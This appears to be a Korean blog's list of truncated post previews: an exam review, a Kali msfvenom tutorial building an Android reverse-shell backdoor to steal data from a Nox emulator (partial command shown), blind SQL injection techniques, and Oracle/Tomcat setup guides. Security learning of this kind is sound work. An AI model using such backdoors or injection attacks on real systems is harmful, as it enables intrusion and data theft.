안녕하세요! 오늘은 정보처리기사 필기 합격 후기에대하여 작성해볼까합니다.자격증 취득목적은 취업이 아니라.. 사실 제가 컴퓨터랑 아주 밀접한 관련이 있는 학과는 아니여서 컴퓨터에 대한 기본지식이 부족하다 생각이되어 취득을 결정했습니다. Semi-비전공자 라고 생각해볼수 있겠네요 하하!.... [평균 81점으로 넉넉하게 합격!] 공부기간 : 3일 (하루공부시간 대략 13시간)공부교재 : 시나공 정보처리기사 필기 기출문제집공부방법 : 기출문제집 반복 (2024, 2023년도 기출문제 반복 [총 6회차]) - 6회차를 총 5회독[ 단기간 공부법 & TIP ]> 저는 우선 다른분들과 같이 기출문제집을 보았습니다. 기출문제집을 처음 피시면 막막하실겁니다."아니 아는 개념도 하나도 없는데 뭘 알고 풀라는거야? 일단 ..

안녕하세요! 오늘은 kali Linux에 있는 metasploit 툴의 하나인 msfvenom을 통해서 백도어를 만든후 nox 프로그램에 잠입하여 민감한 정보를 탈취하는 것을 목표로 하는 포스팅입니다. ※ 해당 실습은 가상머신으로 이루어진 글입니다. 실제 외부 네트워크에서 진행할 시 불법이므로 모든 책임은 본인에게 있습니다. 우선 준비물은 아래와 같습니다.Kali LinuxNox 앱플레이어1. 우선 칼리리눅스를 실행합니다. 2. 명령어창의 ifconfig 명령어를 입력하여 Kali의 IP Address 를 확인합니다. 3. 이후 아래의 명령어를 사용하여 백도어 앱을 만들어줍니다. 사용된 명령어는 아래와 같습니다.명령어 : msfvenom -p android/meterpreter/reverse_Tcp LH..

안녕하세요! 오늘은 Blind SQL 기법중 비트연산을 통한 공격을 진행해보겠습니다. 이 방법을 알려드리는 이유는 DB내용이 반드시 영문/숫자 조합일 것이라는 보장이 없기때문입니다. 만약 한글이라면? 기존 ASCII코드로 참거짓을 비교할수도 없고 한글 한문자는 11,172 가지의 경우의 수를 가지기 때문의 너무 연산에 오래걸립니다. 그래서 이 비트연산을 통한 SQL Injection 을 진행하게 되면 어느 문자로 이루어져 있든 보다 신속한 공격이 가능하게 됩니다! 비트연산을 통한 공격은 아래 링크를 통해 설명한 바 있으니 참고하시면 좋을것 같습니다. https://jamesbexter.tistory.com/entry/Blind-SQL-인젝션-상황시-알아두면-좋은기법이진탐색-기법Bit-연산기법# 이진탐색"..

안녕하세요! 오늘은 블라인드 SQL인젝션을 진행할 때 알아두면 좋은 두가지를 포스팅하려고 합니다.  이번 포스팅 내용은 다음과 같습니다.이진탐색기법Bit연산기법1. 이진탐색기법> 이진탐색이란 정렬된 리스트에서 임의의 값을 효율적으로 찾기 위한 알고리즘 입니다. 0부터100 사이의 임의의값을 찾으려 하는경우 0 > 1 > 2 > 3 ..... 이런식으로 차례대로 계산하면 너무 비효율적입니다. 그래서 중앙값인 50 보다 크냐 작으냐를 먼저 비교후, 만약 크다면 이후 또 중앙값인 75보다 크냐 작으냐 하는 식으로 중앙값과 비교를 통해 범위를 줄여나간다면 보다 빠르게 임의의값을 찾아낼 수 있을것입니다. 아래 그림은 위 설명을 도식화 한 것입니다. > 파이썬 코드로 표현한 이진탐색 기법 아래는 위에 그림을 파이썬..

안녕하세요! SQL 인젝션에 대하여 공부를 하던중 제가 미숙한 SQL 문법을 발견해서 실험을 해본 내용을 남기는 글입니다!해당 내용을 공부하며 Blind SQL 인젝션 진행시 ASCII를 굳이 쓸 필요 없이 if구문을 를 사용할 수도 있다는 것을 깨달았습니다. if 문으로 참 거짓이 바뀌는 것을 통해 Blind SQL 인젝션을 진행할때 사용해볼 수 있을것 같습니다. 개인적으로 ascii 값을 비교해서 하는방법이 힘들었는데 그것보다는 편해서 종종 이용해볼 것 같습니다 :) SQL 인젝션 공부중 문자 하나만 출력해야 하는 상황에서 드는 의문이 있었습니다. SQL 구문 결과값을 한문자만 출력하거나 TRUE , FALSE 로 출력하려면 어떻게 해야할까?실험 1. 우선 기존의 로그인을 시도한다면 아래와 같은 구문..

안녕하세요! 오늘은 JSP 개발에서 db로 사용될 ORACLE DB를 설치하는 방법에 대하여 포스팅하겠습니다!1. 오라클 설치방법 1. 우선 오라클 공식 홈페이지에서 설치파일을 다운로드 받아줍니다(아래 링크에서 사진에 표시된 파일을 OS에 맞게 받아주시면 됩니다!)https://www.oracle.com/database/technologies/oracle-database-software-downloads.html Database Software Downloads | OracleOracle Database Software Downloads Whether you are a developer, a data scientist, a DBA, an educator, or just interested in datab..

이 게시글은 JSP 개발을 위해 Eclipse 그리고 Tomcat 서버를 설치하는 방법을 다루는 포스팅입니다!우선 JSP 웹 개발을 위해서 필요한 환경은 다음과 같습니다. Java [경로 설정 필요]Tomcat 서버 설치Eclipse 설치Ecipse에 Tomcat 서버 연동1. Java 설치 및 설정 1. 아래 링크를 통해 자바파일을 다운로드 받습니다. https://www.oracle.com/java/technologies/downloads/#jdk23-windows Download the Latest Java LTS FreeSubscribe to Java SE and get the most comprehensive Java support available, with 24/7 global access ..